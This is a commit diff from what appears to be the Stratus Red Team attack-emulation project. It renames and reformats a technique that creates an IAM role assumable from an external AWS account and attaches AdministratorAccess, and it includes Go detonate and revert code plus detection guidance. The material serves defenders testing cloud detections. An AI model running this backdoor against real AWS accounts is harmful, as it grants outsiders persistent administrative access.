small code changes

DataDog · Feb 7, 2024 · 159ef74 · 159ef74
1 parent 9879794
commit 159ef74
Show file tree

Hide file tree

Showing 5 changed files with 29 additions and 28 deletions.
diff --git a/docs/attack-techniques/AWS/aws.persistence.iam-create-backdoor-role.md b/docs/attack-techniques/AWS/aws.persistence.iam-create-backdoor-role.md
@@ -1,8 +1,8 @@
 ---
-title: Create a new backdoor IAM Role
+title: Create a backdoored IAM Role
 ---
 
-# Create a new backdoor IAM Role
+# Create a backdoored IAM Role
 
 
 
@@ -17,15 +17,16 @@ Platform: AWS
 ## Description
 
 
-Establishes persistence by creating a backdoored new role with a policy allowing it to be assumed from an external AWS account and administrative permissions.
+Establishes persistence by creating a new backdoor role with a trust policy allowing it to be assumed from 
+an external, fictitious attack AWS account.
 
 <span style="font-variant: small-caps;">Warm-up</span>: None.
 
 <span style="font-variant: small-caps;">Detonation</span>: 
 
-- Create a new IAM role with an assume role policy backdoored, making it accessible from an external, fictitious AWS account:
+- Create a new IAM role with the following trust policy:
 
-```
+```json
 {
   "Version": "2012-10-17",
   "Statement": [
@@ -47,7 +48,7 @@ Establishes persistence by creating a backdoored new role with a policy allowing
 }
 ```
 
-and attach the 'AdministratorAccess' managed IAM policy to it. 
+- Attach the 'AdministratorAccess' managed IAM policy to it. 
 
 References:
 
@@ -67,7 +68,7 @@ which generates a finding when a role can be assumed from a new AWS account or p
 
 - Identify a call to <code>CreateRole</code> closely followed by <code>AttachRolePolicy</code> with an administrator policy.
 
-- Identify a call to <code>CreateRole</code> that contains an <code>assumeRolePolicyDocument</code> in the <code>requestParameters</code> that allows access from an external AWS account. Sample event:
+- Identify a call to <code>CreateRole</code> that contains an assumeRolePolicyDocument in the requestParameters that allows access from an external AWS account. Sample event:
 
 ```
 {

diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md
@@ -88,7 +88,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Create an administrative IAM User](./aws.persistence.iam-create-admin-user.md)
 
-- [Create a new backdoor IAM Role](./aws.persistence.iam-create-backdoor-role.md)
+- [Create a backdoored IAM Role](./aws.persistence.iam-create-backdoor-role.md)
 
 - [Create a Login Profile on an IAM User](./aws.persistence.iam-create-user-login-profile.md)
 

diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md
@@ -38,7 +38,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Backdoor an IAM Role](./AWS/aws.persistence.iam-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create an Access Key on an IAM User](./AWS/aws.persistence.iam-backdoor-user.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Create an administrative IAM User](./AWS/aws.persistence.iam-create-admin-user.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
-| [Create a new backdoor IAM Role](./AWS/aws.persistence.iam-create-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence |
+| [Create a backdoored IAM Role](./AWS/aws.persistence.iam-create-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |

diff --git a/docs/index.yaml b/docs/index.yaml
@@ -215,7 +215,7 @@ AWS:
           platform: AWS
           isIdempotent: false
         - id: aws.persistence.iam-create-backdoor-role
-          name: Create a new backdoor IAM Role
+          name: Create a backdoored IAM Role
           isSlow: false
           mitreAttackTactics:
             - Persistence

diff --git a/v2/internal/attacktechniques/aws/persistence/iam-create-backdoor-role/main.go b/v2/internal/attacktechniques/aws/persistence/iam-create-backdoor-role/main.go
@@ -13,28 +13,29 @@ import (
 //go:embed malicious_policy.json
 var maliciousIamPolicy string
 
-var roleName string = "malicious-iam-role"
+var roleName string = "stratus-red-team-malicious-iam-role"
 var adminPolicyArn string = "arn:aws:iam::aws:policy/AdministratorAccess"
 
 func init() {
 	const codeBlock = "```"
 	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
 		ID:           "aws.persistence.iam-create-backdoor-role",
-		FriendlyName: "Create a new backdoor IAM Role",
+		FriendlyName: "Create a backdoored IAM Role",
 		Description: `
-Establishes persistence by creating a backdoored new role with a policy allowing it to be assumed from an external AWS account and administrative permissions.
+Establishes persistence by creating a new backdoor role with a trust policy allowing it to be assumed from 
+an external, fictitious attack AWS account.
 
 Warm-up: None.
 
 Detonation: 
 
-- Create a new IAM role with an assume role policy backdoored, making it accessible from an external, fictitious AWS account:
+- Create a new IAM role with the following trust policy:
 
-` + codeBlock + `
+` + codeBlock + `json
 ` + maliciousIamPolicy + `
 ` + codeBlock + `
 
-and attach the 'AdministratorAccess' managed IAM policy to it. 
+- Attach the 'AdministratorAccess' managed IAM policy to it. 
 
 References:
 
@@ -59,11 +60,11 @@ which generates a finding when a role can be assumed from a new AWS account or p
 }
 ` + codeBlock + `
 `,
-		Platform:                   stratus.AWS,
-		IsIdempotent:               false, // cannot create twice a role with the same name
-		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Persistence},
-		Detonate:                   detonate,
-		Revert:                     revert,
+		Platform:           stratus.AWS,
+		IsIdempotent:       false, // cannot create twice a role with the same name
+		MitreAttackTactics: []mitreattack.Tactic{mitreattack.Persistence},
+		Detonate:           detonate,
+		Revert:             revert,
 	})
 }
 
@@ -76,20 +77,19 @@ func detonate(_ map[string]string, providers stratus.CloudProviders) error {
 		AssumeRolePolicyDocument: &maliciousIamPolicy,
 	}
 
-	_, err := iamClient.CreateRole(context.TODO(), input)
+	_, err := iamClient.CreateRole(context.Background(), input)
 	if err != nil {
 		return errors.New("Unable to create IAM role: " + err.Error())
 	}
 
 	log.Println("IAM role created: " + roleName)
-
-
+
 	attachPolicyInput := &iam.AttachRolePolicyInput{
 		RoleName:  &roleName,
 		PolicyArn: &adminPolicyArn,
 	}
 
-	_, err = iamClient.AttachRolePolicy(context.TODO(), attachPolicyInput)
+	_, err = iamClient.AttachRolePolicy(context.Background(), attachPolicyInput)
 	if err != nil {
 		log.Fatalf("Unable to attach AdministratorAccess policy to IAM role: %v", err)
 	}
@@ -104,7 +104,7 @@ func revert(_ map[string]string, providers stratus.CloudProviders) error {
 		RoleName:  &roleName,
 		PolicyArn: &adminPolicyArn,
 	}
-	_, err := iamClient.DetachRolePolicy(context.TODO(), detachPolicyInput)
+	_, err := iamClient.DetachRolePolicy(context.Background(), detachPolicyInput)
 	if err != nil {
 		return errors.New("Unable to detach policy from IAM role: " + err.Error())
 	}
@@ -113,11 +113,11 @@ func revert(_ map[string]string, providers stratus.CloudProviders) error {
 	input := &iam.DeleteRoleInput{
 		RoleName: &roleName,
 	}
-	_, err = iamClient.DeleteRole(context.TODO(), input)
+	_, err = iamClient.DeleteRole(context.Background(), input)
 	if err != nil {
 		return errors.New("Unable to delete IAM role: " + err.Error())
 	}
 
 	log.Println("IAM role deleted: " + roleName)
 	return nil
-}
+}